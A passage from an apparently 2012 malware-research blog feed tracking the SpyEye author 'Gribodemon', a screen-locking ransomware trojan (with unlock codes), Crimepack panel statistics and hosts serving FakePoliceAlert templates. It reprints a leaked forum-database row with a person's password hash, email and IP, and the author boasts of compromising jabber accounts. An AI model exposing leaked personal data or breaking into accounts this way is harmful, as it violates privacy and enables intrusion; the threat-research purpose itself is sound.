1em;"><img border="0" height="283" src="http://3.bp.blogspot.com/-bpP7uZc2H_E/TrmpyMpfz3I/AAAAAAAADR0/eYp4wGcR6sc/s400/DataGrabber2.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rRHk4jfhhDo/TrmsZaraN-I/AAAAAAAADR8/Oa-w1C86LRY/s1600/DataGrabber3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-rRHk4jfhhDo/TrmsZaraN-I/AAAAAAAADR8/Oa-w1C86LRY/s400/DataGrabber3.PNG" width="360" /></a></div><br />On a limit of 100 users, infos was grabbed for these programs:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">Mozilla Firefox/Opera/Internet Explorer/Google Chrome<br />Windows Live Messenger/Windows Live Mail<br />FileZilla/Windows/Total Commander/Core FTP/FreeFTP/DirectFTP<br />Mozilla Thunderbird/Outlook/IncrediMail<br />CamFrog/Cisco VPN Client/PokerStars<br />Windows RAS/ASP.NET/Virgin Mobile</div>of course this plugin target many more application, it's just a tiny part.<br /><br />A guys with alot of plugins:<br /><br /><br /><center><img border="0" src="http://2.bp.blogspot.com/-B-RqP1wjtMI/TsJk4s0g9rI/AAAAAAAADa8/bFavMckjYS8/s1600/15-11-2011+14-08-48.jpg" /></center><br /><br />Now let's talk about Gribo who has gone into hiding and taken down his infrastructure.<br />A tiny graph about Gribodemon connections:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bJH9Ep1afHg/T3GO0506ZJI/AAAAAAAAFpA/GWe4po3hKhU/s1600/gribodemon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="282" src="http://3.bp.blogspot.com/-bJH9Ep1afHg/T3GO0506ZJI/AAAAAAAAFpA/GWe4po3hKhU/s400/gribodemon.png" width="400" /></a></div><br />The SpyEye support:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-VYqdfghvp6A/T0yjDfdkuJI/AAAAAAAAFUI/Tk6WJjEOX_Y/s1600/SpyTicket.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="http://4.bp.blogspot.com/-VYqdfghvp6A/T0yjDfdkuJI/AAAAAAAAFUI/Tk6WJjEOX_Y/s400/SpyTicket.PNG" width="400" /></a></div><br />Many people think there is just one guys behind SpyEye but there is an entire team.<br />Example with a ticket, Isla (you are a true skyzophrene dude) who use social engineering for get his license back.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-0Cv4Fn6PjdI/T3IoGbwX-CI/AAAAAAAAFpY/xtWV_liRkaw/s1600/t1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-0Cv4Fn6PjdI/T3IoGbwX-CI/AAAAAAAAFpY/xtWV_liRkaw/s400/t1.PNG" width="182" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nzNpRRUZzV8/T3In5jvAY-I/AAAAAAAAFpQ/dVv1-eguz_8/s1600/t2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="http://2.bp.blogspot.com/-nzNpRRUZzV8/T3In5jvAY-I/AAAAAAAAFpQ/dVv1-eguz_8/s320/t2.PNG" width="320" /></a></div>So what's can we says...<br />1) Gribodemon don't respond directly<br />2) SpyEye team don't care about vulnerability report (LOL)<br /><br />Another ticket regarding a bugfix:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PKGHWm1jiUU/T3JGeBIJh6I/AAAAAAAAFqA/hGqBCagoUOk/s1600/t3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="72" src="http://3.bp.blogspot.com/-PKGHWm1jiUU/T3JGeBIJh6I/AAAAAAAAFqA/hGqBCagoUOk/s400/t3.PNG" width="400" /></a></div>No answer from the SpyEye team and the ticket is still open today.<br /><br /><br />Now to come back on the first picture with contacts info of Gribodemon<br />glazgo-update-notifier@gajim.org:<br />This jabber adress was a bot for get latest SpyEye packages<br />In September 2011 many 'good guys' used this service for get the latest SpyEye toolkit.<br />The SpyEye team added later a filter as response who reply each time "Unkown command. Type "!help" to display list of avaiable commands" if you are not a customer.<br />Anyway i've compromised many jabber accounts who was on the white list so...:)<br /><br />For the Email "gribodemon@pochta.ru" it was one of the first adress he used for sell products.<br />When Antichat was hacked and the db published you can even find details related to this adress:<br /><div class="sql" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: #66cc66;">(</span><span style="color: #cc66cc;">87372</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">2</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: red;">'gribodemon'</span><span style="color: #66cc66;">,</span> <span style="color: red;">'be1120301dc625eb3495754d8917fd58'</span><span style="color: #66cc66;">,</span> <span style="color: red;">'2009-06-07'</span><span style="color: #66cc66;">,</span> <span style="color: red;">'gribodemon@pochta.ru'</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: red;">'4571122'</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">1</span><span style="color: #66cc66;">,</span> <span style="color: red;">'&amp;#1056;&amp;#1116;&amp;#1056;&amp;#1109;&amp;#1056;&amp;#1030;&amp;#1056;&amp;#1105;&amp;#1057;‡&amp;#1056;&amp;#1109;&amp;#1056;&amp;#1108;'</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">1244321423</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">1274652004</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">1275689120</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">1275688931</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">4</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">9</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">4</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">5</span><span style="color: #66cc66;">,</span> <span style="color: red;">'3'</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">100</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">100</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">3415</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: red;">'0000-00-00'</span><span style="color: #66cc66;">,</span> <span style="color: #66cc66;">-</span><span style="color: #cc66cc;">1</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">1</span><span style="color: #66cc66;">,</span> <span style="color: red;">'93.91.114.18'</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: red;">''</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #66cc66;">-</span><span style="color: #cc66cc;">1</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">10</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">2</span><span style="color: #66cc66;">,</span> <span style="color: red;">' S3'</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">39074</span><span style="color: #66cc66;">,</span> <span style="color: red;">'A410615478A274836618A591384711A705316511A35415316A451064195A1479238499A1963182541'</span><span style="color: #66cc66;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">,</span></div><br />He used firstly ICQ (<a href="http://www.icq.com/people/4571122/">4571122</a>) then moved to jabber "gribo-demon@jabber.ru" Example <a href="http://xylibox.blogspot.fr/2010/12/spyeye-v1299-protection-sucks.html">in my blog</a> with a conversation between Gribodemon and a customer<br /><br />For the mail 'gribodemon5@gmail.com' of virtest it's a fake adress, the guys under is probably Ishigo (who is also a customer of SpyEye) <br /><br />And for johnlecun@gmail.com and shwark.power.andrew@gmail.com i've no idea what's these gmail adress was used for, and if gribo was really behind.<br /><br />Well, now that the e-mails of gribo are also demystified, let's look for some old stuff.<br /><br />Gribodemon selling 'Email Regger' in 2009:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-zGswMprw6pE/TvzPpbSH5oI/AAAAAAAAEZg/VLf_HBaiqfg/s1600/adv.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="http://3.bp.blogspot.com/-zGswMprw6pE/TvzPpbSH5oI/AAAAAAAAEZg/VLf_HBaiqfg/s400/adv.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-eRxaOPyvtzc/TvzOeczsLGI/AAAAAAAAEZI/AujrhAPZji4/s1600/shot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-eRxaOPyvtzc/TvzOeczsLGI/AAAAAAAAEZI/AujrhAPZji4/s400/shot.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DJLXH4q6PCg/TvzOjWsBgpI/AAAAAAAAEZU/hA2su-Vu_jI/s1600/proxycheker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-DJLXH4q6PCg/TvzOjWsBgpI/AAAAAAAAEZU/hA2su-Vu_jI/s400/proxycheker.jpg" width="400" /></a></div><br /><br />gribodemon saying he sell on MF and DC (MF stand probably for maza and DC for DirectConnect)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-C2_j-pO4EJM/T3I-NuZAAbI/AAAAAAAAFpo/GbuLJlikpLM/s1600/28-03-2012+00-24-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="http://4.bp.blogspot.com/-C2_j-pO4EJM/T3I-NuZAAbI/AAAAAAAAFpo/GbuLJlikpLM/s400/28-03-2012+00-24-23.png" width="400" /></a></div><br />gribodemon answers to guys who lynch him<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-c1aAknhs5Po/T3I9hNKbRdI/AAAAAAAAFpg/UffSlQOBys4/s1600/grib.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-c1aAknhs5Po/T3I9hNKbRdI/AAAAAAAAFpg/UffSlQOBys4/s400/grib.PNG" width="381" /></a></div><br />gribodemon have a phoenix exploit kit and traffic on it<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-kL2YP9MxE50/T3JAAUYHioI/AAAAAAAAFpw/ci0YJUfaPOU/s1600/28-03-2012+00-31-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="131" src="http://2.bp.blogspot.com/-kL2YP9MxE50/T3JAAUYHioI/AAAAAAAAFpw/ci0YJUfaPOU/s400/28-03-2012+00-31-24.png" width="400" /></a></div><br />That all... for the moment.<br />There is alot of things to say on what currently happens, others bloggers and av guys will probably make more constructed posts... wait and see.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-hc_04UI5kR0/T3JCqtatogI/AAAAAAAAFp4/1sqNT3Lj25o/s1600/1331839506590.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://2.bp.blogspot.com/-hc_04UI5kR0/T3JCqtatogI/AAAAAAAAFp4/1sqNT3Lj25o/s400/1331839506590.jpg" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-504635188303405249?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/behind-spyeye-gribodemon.htmlnoreply@blogger.com (Steven K)8tag:blogger.com,1999:blog-5365964245877416061.post-277098190529074233Tue, 13 Mar 2012 10:44:00 +00002012-03-13T11:44:12.491+01:00security116+16464816878RansomwareAES0012140809940Malware Protection<img border="0" src="http://2.bp.blogspot.com/-xCdQjCm27tc/T18kOXcaaBI/AAAAAAAAFoA/qUloGyANqFY/s1600/icons.PNG" /><br /><br />Thanks to <a href="http://www.bleepingcomputer.com/">Lawrence</a> for the sample.<br />This trojan blocker (SHA1: <b style="color: red;">567953b3562465587d3b1c8360868d0a6bacde73</b> and <b style="color: red;">3f7c516fc06f84b806e2ab677442fc1e3d927364</b> ) prevents all software execution.<br />To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/--UYHljDH5gU/T18ghOr86aI/AAAAAAAAFng/Y96bx5EeDXU/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://3.bp.blogspot.com/--UYHljDH5gU/T18ghOr86aI/AAAAAAAAFng/Y96bx5EeDXU/s400/1.PNG" width="400" /></a></div><br />Ref: <b style="color: red;">0012140809940</b><br />Phone: <b style="color: red;">+16464816878</b><br />Mail: <b style="color: red;">security116@gmail.com</b><br />Unlock code: <b style="color: red;">76557152140071780302280</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-V4M45RDFTBw/T18iuIAfFlI/AAAAAAAAFn4/OTPOL7lnhdc/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="http://4.bp.blogspot.com/-V4M45RDFTBw/T18iuIAfFlI/AAAAAAAAFn4/OTPOL7lnhdc/s400/4.PNG" width="400" /></a></div><br />2nd version:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-a3KEOw9s4pU/T18hQMvTWcI/AAAAAAAAFno/NPW2YLH3Ne4/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="http://1.bp.blogspot.com/-a3KEOw9s4pU/T18hQMvTWcI/AAAAAAAAFno/NPW2YLH3Ne4/s400/2.PNG" width="400" /></a></div><br />Ref: <b style="color: red;">0012140809940</b><br />Phone: <b style="color: red;">+16464816878</b><br />Mail: <b style="color: red;">security116@gmail.com</b><br />Unlock code: <b style="color: red;">aes987156</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-MbU25piPht8/T18iH9nikqI/AAAAAAAAFnw/mbaWvASuk_g/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="http://1.bp.blogspot.com/-MbU25piPht8/T18iH9nikqI/AAAAAAAAFnw/mbaWvASuk_g/s320/3.PNG" width="320" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-277098190529074233?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/malware-protection.htmlnoreply@blogger.com (Steven K)5tag:blogger.com,1999:blog-5365964245877416061.post-3017909385324375371Sun, 11 Mar 2012 09:01:00 +00002012-03-11T10:09:24.702+01:00Crimepackexploit kitCrimepack 3.1.3Nothing really interesting, just wanna show the (poor) stats of this guys.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-eu_otgOt2eU/T1xpAmmAsUI/AAAAAAAAFm4/AFd0_RcbSrU/s1600/11-03-2012+09-56-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-eu_otgOt2eU/T1xpAmmAsUI/AAAAAAAAFm4/AFd0_RcbSrU/s400/11-03-2012+09-56-46.png" width="400" /></a></div><br />Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5ykGQh6a8fA/T1xoqZy970I/AAAAAAAAFmw/_8xX4T8i7U4/s1600/login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-5ykGQh6a8fA/T1xoqZy970I/AAAAAAAAFmw/_8xX4T8i7U4/s400/login.png" width="400" /></a></div><br />Dashboard:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Hyr_8cPD618/T1xoF5-FS-I/AAAAAAAAFl4/FE5b8A9tPqY/s1600/news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-Hyr_8cPD618/T1xoF5-FS-I/AAAAAAAAFl4/FE5b8A9tPqY/s400/news.png" width="400" /></a></div><br />Referrers<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-JT7sXC9IL8o/T1xoK3T3DmI/AAAAAAAAFmA/O0JKHSjY56c/s1600/referrers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-JT7sXC9IL8o/T1xoK3T3DmI/AAAAAAAAFmA/O0JKHSjY56c/s400/referrers.png" width="400" /></a></div><br />Countries<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-bxHQKWPyud0/T1xoQF2t77I/AAAAAAAAFmI/ITCZ4m-R47Q/s1600/countries.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-bxHQKWPyud0/T1xoQF2t77I/AAAAAAAAFmI/ITCZ4m-R47Q/s400/countries.png" width="400" /></a></div><br />Blacklist checker<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-brgI7i4SZr8/T1xoUeonPgI/AAAAAAAAFmQ/_Zg6TNJ-f08/s1600/blacklist+checker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-brgI7i4SZr8/T1xoUeonPgI/AAAAAAAAFmQ/_Zg6TNJ-f08/s400/blacklist+checker.png" width="400" /></a></div><br />Downloader<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wQ1VesmVxDo/T1xoYtVAaOI/AAAAAAAAFmY/BYgO5y1_L7w/s1600/downloader.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-wQ1VesmVxDo/T1xoYtVAaOI/AAAAAAAAFmY/BYgO5y1_L7w/s400/downloader.png" width="400" /></a></div><br />Iframe<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-iTW7MiVMV74/T1xoc9-NxYI/AAAAAAAAFmg/lUrLSKe22cs/s1600/iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-iTW7MiVMV74/T1xoc9-NxYI/AAAAAAAAFmg/lUrLSKe22cs/s400/iframe.png" width="400" /></a></div><br />Settings<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ScTRfcJClb4/T1xog66U3jI/AAAAAAAAFmo/GQTdPsBbbMI/s1600/settings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="http://4.bp.blogspot.com/-ScTRfcJClb4/T1xog66U3jI/AAAAAAAAFmo/GQTdPsBbbMI/s400/settings.png" width="400" /></a></div><br />Who want the kit ?<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-yf9gx6o0hOQ/T1xqsq-bM9I/AAAAAAAAFnA/n19E2fS1JzM/s1600/11-03-2012+10-04-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://2.bp.blogspot.com/-yf9gx6o0hOQ/T1xqsq-bM9I/AAAAAAAAFnA/n19E2fS1JzM/s400/11-03-2012+10-04-05.png" width="400" /></a></div><br />Edit: Another domain:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-xp4jey5dFsM/T1xruPw1M5I/AAAAAAAAFnI/hEGQQ5FK6N8/s1600/11-03-2012+10-08-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-xp4jey5dFsM/T1xruPw1M5I/AAAAAAAAFnI/hEGQQ5FK6N8/s400/11-03-2012+10-08-20.png" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3017909385324375371?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/crimepack-313.htmlnoreply@blogger.com (Steven K)7tag:blogger.com,1999:blog-5365964245877416061.post-6583239920331226513Sun, 11 Mar 2012 00:06:00 +00002012-03-11T10:22:13.958+01:00GEMAukashpaysafecardFakePoliceAlertGEMA / FakePoliceAlert and money launderingSince some days i was back on winlock tracking due to several requests.<br />Let's show some results.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-EDl_-_DpbnA/T1vbLhUCJ4I/AAAAAAAAFlY/Z1ZGOvKB2Wc/s1600/10-03-2012+23-51-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="341" src="http://1.bp.blogspot.com/-EDl_-_DpbnA/T1vbLhUCJ4I/AAAAAAAAFlY/Z1ZGOvKB2Wc/s400/10-03-2012+23-51-40.png" width="400" /></a></div><br />Pwing blackhole kits (sorry no pictures, no kitten) and shit who distribute it<br />Finally i got multiples interesting IP who host PoliceAlert templates, like this one:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">http://62.76.190.87/US/<br />http://62.76.190.87/CA/<br />http://62.76.190.87/IT/<br />http://62.76.190.87/DE/<br />http://62.76.190.87/FR/<br />http://62.76.190.87/UK/<br />http://62.76.190.87/ES/<br />http://62.76.190.87/SE/<br />http://62.76.190.87/AT/<br />http://62.76.190.87/FI/<br />http://62.76.190.87/GR/<br />http://62.76.190.87/BE/<br />http://62.76.190.87/PT/<br />http://62.76.190.87/LU/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-yqGpjZt8DnQ/T1vTwAOPOxI/AAAAAAAAFjA/YP24dSd2afk/s1600/AT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-yqGpjZt8DnQ/T1vTwAOPOxI/AAAAAAAAFjA/YP24dSd2afk/s400/AT.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-aIhj7Ifl0vs/T1vTyO0852I/AAAAAAAAFjI/dh5HNCggy-g/s1600/BE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-aIhj7Ifl0vs/T1vTyO0852I/AAAAAAAAFjI/dh5HNCggy-g/s400/BE.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PiMtcGmk1vY/T1vTz8U0GRI/AAAAAAAAFjQ/FSSnqesBE8M/s1600/CA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-PiMtcGmk1vY/T1vTz8U0GRI/AAAAAAAAFjQ/FSSnqesBE8M/s400/CA.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-LpjdyVA4Zl0/T1vT1qj36EI/AAAAAAAAFjY/88NIY2qpJkg/s1600/DE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-LpjdyVA4Zl0/T1vT1qj36EI/AAAAAAAAFjY/88NIY2qpJkg/s400/DE.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-0iWdBb6bhGc/T1vT3PAMwsI/AAAAAAAAFjg/iH5TU4HVsZ4/s1600/ES.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-0iWdBb6bhGc/T1vT3PAMwsI/AAAAAAAAFjg/iH5TU4HVsZ4/s400/ES.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-vyKwaA0iscQ/T1vT4uvDkCI/AAAAAAAAFjo/VJn0-taDuP0/s1600/FI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-vyKwaA0iscQ/T1vT4uvDkCI/AAAAAAAAFjo/VJn0-taDuP0/s400/FI.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XGkHadrlgo4/T1vT6PTDs8I/AAAAAAAAFjw/nmpJSMmsb4g/s1600/FR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-XGkHadrlgo4/T1vT6PTDs8I/AAAAAAAAFjw/nmpJSMmsb4g/s400/FR.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-pCDG2-4558s/T1vT7_BRVAI/AAAAAAAAFj4/GATGqJAtG_A/s1600/GR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-pCDG2-4558s/T1vT7_BRVAI/AAAAAAAAFj4/GATGqJAtG_A/s400/GR.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lmXoC1E6kdo/T1vT9gERXJI/AAAAAAAAFkA/tsGBdHtF4FM/s1600/IT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-lmXoC1E6kdo/T1vT9gERXJI/AAAAAAAAFkA/tsGBdHtF4FM/s400/IT.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PJLu8LZQTBU/T1vT_sxpiGI/AAAAAAAAFkI/VRFWHVu_m90/s1600/PT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-PJLu8LZQTBU/T1vT_sxpiGI/AAAAAAAAFkI/VRFWHVu_m90/s400/PT.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rZGx7ypLqLA/T1vUBbZeIzI/AAAAAAAAFkQ/WCxfug40qaw/s1600/SE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-rZGx7ypLqLA/T1vUBbZeIzI/AAAAAAAAFkQ/WCxfug40qaw/s400/SE.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-VSBVfGjrsjY/T1vUC4ewL-I/AAAAAAAAFkY/JceLGf65TtM/s1600/UK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-VSBVfGjrsjY/T1vUC4ewL-I/AAAAAAAAFkY/JceLGf65TtM/s400/UK.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-RQ8ivnnQDQI/T1vUEwW0fSI/AAAAAAAAFkg/GTWnKJkLeQk/s1600/US.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-RQ8ivnnQDQI/T1vUEwW0fSI/AAAAAAAAFkg/GTWnKJkLeQk/s400/US.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ddokB4wBcq0/T1vUZKIfP5I/AAAAAAAAFko/rOIaW3UiBzY/s1600/LU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-ddokB4wBcq0/T1vUZKIfP5I/AAAAAAAAFko/rOIaW3UiBzY/s400/LU.png" width="400" /></a></div><br />Multiple GEMA on another IP:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-8Gb9khE9aD8/T1vZhyKR_oI/AAAAAAAAFlI/TgtH8sxxhmY/s1600/10-03-2012+23-44-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="http://4.bp.blogspot.com/-8Gb9khE9aD8/T1vZhyKR_oI/AAAAAAAAFlI/TgtH8sxxhmY/s400/10-03-2012+23-44-08.png" width="400" /></a></div><br />PHP inside HTML file... *facepalm*<br /><div class="separator" style="clear: both; text-align: center;"><a 